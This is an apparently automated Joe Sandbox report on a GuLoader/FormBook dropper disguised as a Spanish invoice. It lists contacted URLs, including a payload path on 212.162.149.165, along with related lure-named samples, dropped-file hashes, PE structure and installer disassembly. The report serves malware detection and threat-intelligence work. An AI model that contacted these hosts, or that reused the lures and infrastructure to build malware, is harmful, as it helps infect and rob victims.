              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high
              http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
              http://nsis.sf.net/NSIS_ErrorError | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096597469.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196408647.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
              http://212.162.149.165/psKGLMYRljeu25.binu | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006562000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000626000.00000020.00000001.01000000.00000007.sdmp | false | | high
              http://www.gopher.ftp://ftp. | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
              http://212.162.149.165/Q | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://212.162.149.165/psKGLMYRljeu25.bino | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
67.223.117.189 | www.flourishno.life | United States | 15189 | VIMRO-AS15189US | true
212.162.149.165 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1592061
                              Start date and time:2025-01-15 18:16:18 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 16m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:FACTURA PROFORMA MATRICULACI#U00d3N.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/10@3/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 93%
                              • Number of executed functions: 91
                              • Number of non-executed functions: 308
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              No simulations
Match: 67.223.117.189
Associated Sample Name / URL | Detection | Threat Name | Context
PO -2025918.exe | malicious | FormBook, PureLog Stealer | www.actionhub.live/gq43/
PO 2025918 pdf.exe | malicious | FormBook, PureLog Stealer | www.actionhub.live/gq43/
foljNJ4bug.exe | malicious | FormBook | www.gutpox.life/bcpd/
w64HYOhfv1.exe | malicious | FormBook | www.uburn.xyz/iqqs/
enkJ6J7dAn.exe | malicious | FormBook | www.uburn.xyz/iqqs/
PO-78140924.BAT.PDF.exe | malicious | FormBook | www.heldhold.xyz/fava/
rP0n___87004354.exe | malicious | FormBook | www.heldhold.xyz/fava/
Enquiry.exe | malicious | FormBook | www.uburn.xyz/iqqs/
AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | www.uburn.xyz/unks/
ncOLm62YLB.exe | malicious | FormBook | www.uburn.xyz/unks/
                              No context
Match: UNREAL-SERVERSUS
Associated Sample Name / URL | Detection | Threat Name | Context
RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 212.162.149.53
FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | malicious | FormBook, GuLoader | 212.162.149.153
FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | malicious | FormBook, GuLoader | 212.162.149.153
rArz0wnYVU.exe | malicious | GuLoader | 212.162.149.94
rArz0wnYVU.exe | malicious | GuLoader | 212.162.149.94
RFQ NO 65-58003.exe | malicious | Remcos | 212.162.149.92
Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 162.251.122.87
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 162.251.122.87
Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 162.251.122.87
WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | 162.251.122.87
Match: VIMRO-AS15189US
Associated Sample Name / URL | Detection | Threat Name | Context
PO -2025918.exe | malicious | FormBook, PureLog Stealer | 67.223.117.189
PO 2025918 pdf.exe | malicious | FormBook, PureLog Stealer | 67.223.117.189
Scanned-IMGS_from NomanGroup IDT.scr.exe | malicious | FormBook | 67.223.117.142
ydJaT4b5N8.exe | malicious | FormBook | 67.223.118.94
Nieuwebestellingen10122024.exe | malicious | FormBook | 67.223.117.169
specification and drawing.exe | malicious | FormBook, PureLog Stealer | 67.223.117.169
dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | 67.223.117.169
PO AT-5228.exe | malicious | FormBook | 67.223.117.142
shipping doc_20241111.exe | malicious | FormBook | 67.223.117.142
fHkdf4WB7zhMcqP.exe | malicious | FormBook | 67.223.118.17
                              No context
Match: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll
Associated Sample Name / URL | Detection | Threat Name
Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown
Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown
Thermo Fisher RFQ_TFS-1207.com.exe | malicious | GuLoader
Thermo Fisher RFQ_TFS-1207.com.exe | malicious | GuLoader
TRIAL_ORDER_CP.exe | malicious | FormBook, GuLoader
TRIAL_ORDER_CP.exe | malicious | GuLoader
Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader
FedEx Shipping Confirmation.exe | malicious | GuLoader, Snake Keylogger
IMG_00991ORDER_FILES.exe | malicious | FormBook, GuLoader
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):321034
                                                Entropy (8bit):7.573816828298902
                                                Encrypted:false
                                                SSDEEP:6144:iMEsA+pXikNwWATbVZvTWWGFFxRxvH7fXPd9b:4s1pXikN4TbfWWGPtvbH7
                                                MD5:3D1FF402CE5E021B4DD0F10B3D41BB7C
                                                SHA1:605E5279257E451934357E282580379056EF86DA
                                                SHA-256:7AB2FA914514E1998DC0930899523A52B2AB51D331B69069BB76E516CF22BA66
                                                SHA-512:69E0A2347FC0D8C7302B1792D1F6ECAED52F0D22FF6EC6FA1E8D405C91601B4F35FEC53D083BCA00C27E5E678D94F7CB3DDA0D54DBB629AE0540B093DFB9966A
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir, Author: Joe Security
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1000x1080, components 3
                                                Category:dropped
                                                Size (bytes):124664
                                                Entropy (8bit):7.89877865008063
                                                Encrypted:false
                                                SSDEEP:3072:zoTo6OkPl5nYyhXfxoyLyvrGKPQeYgdzigvrw8GbsWlT:8xPl5n1XpZ4Nk6rw8Gj9
                                                MD5:85392B11BEAA8A522DD01CC279FF7BA9
                                                SHA1:DC55B91783F7FCF12F464B7C1547402A32B12352
                                                SHA-256:DFCFF77F1BBB4F200B6D1CE6C7994372AEEB2AF922C19544EB263276A8DE98B4
                                                SHA-512:38907EEC15A0D805A4AB87D791D7684A262E2542CF999A47D3A8ED4EA78E2349449EC90F350B2AD8420C9D07D30A2B27A1125B71166AAB93EA4A0EC42ECB8125
                                                Malicious:false
                                                Reputation:low
                                                Preview:......JFIF.....H.H......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.4.0-Exiv2"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/"> <dc:creator> <rdf:Seq> <rdf:li>VectorStock.com/8988055</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):474147
                                                Entropy (8bit):1.2497915423628485
                                                Encrypted:false
                                                SSDEEP:1536:Pn8UXv4DaYQBLo6nhLDZoPrdYV/L4nv++eI:Pn8taRBntVv6eI
                                                MD5:B6FF1232C3CF4077EDA721ABC31189ED
                                                SHA1:A64C6B34BFE4FDBDEB06774CFE93833DB3B3B927
                                                SHA-256:625EF536F1E3F19884BDF7CCB43D0640AEF8B96C328576829F53198C4E9A3CB5
                                                SHA-512:5D243B654C2C8BFD66BB425C25352AD9263A8C8B74185FC1FBCE5E3F74A552B1D0320F1967748A1D929ACA8229C90A7A0B456D9D8D039F830882B28DA11D41BC
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):36500
                                                Entropy (8bit):1.2374589016548323
                                                Encrypted:false
                                                SSDEEP:384:ljhCyY8Q+/jpNnvSULUEeOYUalMFWiRlK/U:KWXv/vsUSsl
                                                MD5:154A56CAB30829F200C479A1CEFB7D24
                                                SHA1:DD1CA6FF1D89D2DB271EA7AE4B546B62CF66C35D
                                                SHA-256:DE4698580013B6DA9D438C44DF514AA1F9C40F46CEE34426CA9E5F253BE3562F
                                                SHA-512:8F1D4C9752C5DDB14B9B241D5E9647DA3B35EB53692AF6995329A6AEBE5FFB270CD5A963385DDFD792F8F3C22233D9CE47ADEBF8E3BEACF9B5A1C58D66AB901F
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):104098
                                                Entropy (8bit):2.6467864251696804
                                                Encrypted:false
                                                SSDEEP:1536:pniD90omAmJfPLgJ4M9bFdupg/GCGwnDJZl7JGc3VKJtzfCfVG5BYHkRq7dQL:piJ0FffOJLKzfL
                                                MD5:A90C0418EB0D9C92DCF7FD60DBD0E5AA
                                                SHA1:4E005092435A64CD7603866F213308FC7DFE7270
                                                SHA-256:0DE89DE7CA46CFA85AA81FF47F23AFFFB42AEC1F7C2ABAACFF7B1BAE477D4C66
                                                SHA-512:E8F972A5147EAF8FAFFA5E6ACE40C3607C5A72583465EF02B4257DD918C10854CF96FCD896F63F02CF08F78B2A6A658CCC281C0ADBCE5E1C3383A464752D0A7E
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):71522
                                                Entropy (8bit):1.2523976755847652
                                                Encrypted:false
                                                SSDEEP:384:AzbMD4epdEp9mqkQUa12jVmdCLXDCBBdT0BWavZHmQ0ScJt9Hvb9Mnnwt8S0NXh0:WX1NiuDdT0HFcJt9PRSrS0Nhlx3Pq5
                                                MD5:53BDC75CA85CE26720653222D6FF307E
                                                SHA1:37A1B4BE95D98F63CF8C21DD2506E5B06B4832E7
                                                SHA-256:1950BE1727DB7C86505D3E16DDFCE4B031057A77A109E4528DE646B93567414E
                                                SHA-512:F8F22E981F8D3102260AD2A19BCF6ECC87EC3B48AD9B2582D3EE0E3F689FF4E98F19B52533A001F863611374B0C3A2463602E2531A29B61617C624DAC3B57314
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\rasphone.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):135168
                                                Entropy (8bit):1.1142956103012707
                                                Encrypted:false
                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):5632
                                                Entropy (8bit):3.817430038996001
                                                Encrypted:false
                                                SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                MD5:549EE11198143574F4D9953198A09FE8
                                                SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious
                                                • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious
                                                • Filename: Thermo Fisher RFQ_TFS-1207.com.exe, Detection: malicious
                                                • Filename: Thermo Fisher RFQ_TFS-1207.com.exe, Detection: malicious
                                                • Filename: TRIAL_ORDER_CP.exe, Detection: malicious
                                                • Filename: TRIAL_ORDER_CP.exe, Detection: malicious
                                                • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious
                                                • Filename: FedEx Shipping Confirmation.exe, Detection: malicious
                                                • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.804946284177748
                                                Encrypted:false
                                                SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):533
                                                Entropy (8bit):3.1634456852441932
                                                Encrypted:false
                                                SSDEEP:12:8wl0mkLNSKw3zKw3s+Q1olfW+kjcmAUcS+:8PAZGizZec1
                                                MD5:2FA011523D427A6E8872826710C1AF65
                                                SHA1:F0AE97A4E4A8B2BC8E2D83EF413B66DCBF115CF6
                                                SHA-256:58499F44485164D34959BBB75B1FF385B07032E42DC974087B9C993BF91B78E9
                                                SHA-512:12D6F2812C1A8375462664426B90E9100F67B9F8F6D5FB17DD3F4BD12C1B9C7D186B377260C938D27B5DB2C63F9278A8130DCF88BC8EDE56AD4C328D53953378
                                                Malicious:false
                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\.....................2...........Transformationsmodeller.Tri12.l............................................T.r.a.n.s.f.o.r.m.a.t.i.o.n.s.m.o.d.e.l.l.e.r...T.r.i.1.2...,...2.....\.....\.....\.....\.....\.....\.....\.T.r.a.n.s.f.o.r.m.a.t.i.o.n.s.m.o.d.e.l.l.e.r...T.r.i.1.2.J.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.s.t.e.e.l.m.a.k.e.\.b.i.m.l.e.t.....
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.913091230700521
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File size:578'322 bytes
                                                MD5:66d651e5546dedafd0a252400b70c21d
                                                SHA1:e7d2f22f36489ab390a293bc9e0b048df09675f1
                                                SHA256:94df904f108f2aa1f8ffdbe2d119ac899fe12e664057792c51662878fdeb21ec
                                                SHA512:12875f74010fcf30c40675cb667aff29012754b67b4d0bd5b2883ea78cde7234942287d6ca129f0c52a05617704e080b97cf3253d890c6bb24b1a9919d343eaf
                                                SSDEEP:12288:KXb+e00Q9gJNxIbmOM20k8Lrb9QBc2qg3PdONLzJ2/+poNM730+C08Apw:KXbTm9pgLXQBP4Nf4gfC5
                                                TLSH:B9C4124473A08227DAA492307E628BF76EE8B4170760079B77FADABDBD31143961B1D4
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                                Icon Hash:e98e43534d47331b
                                                Entrypoint:0x40351c
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A2D8h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A4h]
                                                mov esi, dword ptr [004080A8h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007FE3CCBEB0DAh
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007FE3CCBEB0A8h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [00429AD8h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x82c8 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x6576 | 0x6600 | 1e4066ed6e7440cc449c401dfd9ca64f | False | 0.6663219975490197 | data | 6.461246686118911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0xa000 | 0x1fb38 | 0x600 | 2e1d49b2855a89e6218e118f0c182b81 | False | 0.5026041666666666 | data | 4.044293204800279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata | 0x2a000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x53000 | 0x82c8 | 0x8400 | 179962530ffa5dbbe5ab5936018f02db | False | 0.4229107481060606 | data | 5.222625912327323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_ICON | 0x53448 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3934647302904564
                                                RT_ICON | 0x559f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.47701688555347094
                                                RT_ICON | 0x56a98 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5007995735607675
                                                RT_ICON | 0x57940 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5684426229508197
                                                RT_ICON | 0x582c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.552797833935018
                                                RT_ICON | 0x58b70 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5132488479262672
                                                RT_ICON | 0x59238 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.2530487804878049
                                                RT_ICON | 0x598a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4111271676300578
                                                RT_ICON | 0x59e08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6524822695035462
                                                RT_ICON | 0x5a270 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.34139784946236557
                                                RT_ICON | 0x5a558 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.38934426229508196
                                                RT_ICON | 0x5a740 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.44256756756756754
                                                RT_DIALOG | 0x5a868 | 0xb8 | data | English | United States | 0.6467391304347826
                                                RT_DIALOG | 0x5a920 | 0x144 | data | English | United States | 0.5216049382716049
                                                RT_DIALOG | 0x5aa68 | 0x100 | data | English | United States | 0.5234375
                                                RT_DIALOG | 0x5ab68 | 0x11c | data | English | United States | 0.6056338028169014
                                                RT_DIALOG | 0x5ac88 | 0x60 | data | English | United States | 0.7291666666666666
                                                RT_GROUP_ICON | 0x5ace8 | 0xae | data | English | United States | 0.5919540229885057
                                                RT_VERSION | 0x5ad98 | 0x2a0 | data | English | United States | 0.5014880952380952
                                                RT_MANIFEST | 0x5b038 | 0x290 | XML 1.0 document, ASCII text, with very long lines (656), with no line terminators | English | United States | 0.5625
                                                DLL | Import
                                                ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
